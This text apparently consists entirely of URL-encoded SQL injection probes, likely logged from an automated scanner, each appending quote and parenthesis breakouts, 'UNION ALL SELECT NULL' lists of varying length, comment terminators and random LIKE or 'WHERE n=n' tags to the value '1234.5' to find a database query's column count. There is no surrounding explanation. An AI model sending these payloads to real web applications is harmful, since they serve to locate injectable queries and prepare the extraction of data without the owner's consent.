1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22shBe%22%20LIKE%20%22shBe 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22tbZA%22%20LIKE%20%22tbZA 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Kncd%22%20LIKE%20%22Kncd 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22nktG%22%20LIKE%20%22nktG 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22emZn%22%20LIKE%20%22emZn 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22FTUU%22%20LIKE%20%22FTUU 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22TrGX%22%20LIKE%20%22TrGX 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22tRrC%22%20LIKE%20%22tRrC 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22RxkW%22%20LIKE%20%22RxkW 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22qZGf%22%20LIKE%20%22qZGf 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22MVpL%22%20LIKE%20%22MVpL 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22KJRD%22%20LIKE%20%22KJRD 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22dnCR%22%20LIKE%20%22dnCR 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22HSdk%22%20LIKE%20%22HSdk 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22DefG%22%20LIKE%20%22DefG 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22drsy%22%20LIKE%20%22drsy 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22KVpW%22%20LIKE%20%22KVpW 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22oLHb%22%20LIKE%20%22oLHb 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22axwA%22%20LIKE%20%22axwA 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22xuqn%22%20LIKE%20%22xuqn 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22eWwg%22%20LIKE%20%22eWwg 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22kcWU%22%20LIKE%20%22kcWU 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22UoWM%22%20LIKE%20%22UoWM 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22zfke%22%20LIKE%20%22zfke 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22tNdR%22%20LIKE%20%22tNdR 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22EHuo%22%20LIKE%20%22EHuo 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Rxsl%22%20LIKE%20%22Rxsl 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ehup%22%20LIKE%20%22ehup 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22wZDx%22%20LIKE%20%22wZDx 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ZNiL%22%20LIKE%20%22ZNiL 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22fPzk%22%20LIKE%20%22fPzk 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22WNMU%22%20LIKE%20%22WNMU 1234.5%29%20WHERE%203367%3D3367%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%202362%3D2362%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20WHERE%205504%3D5504%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 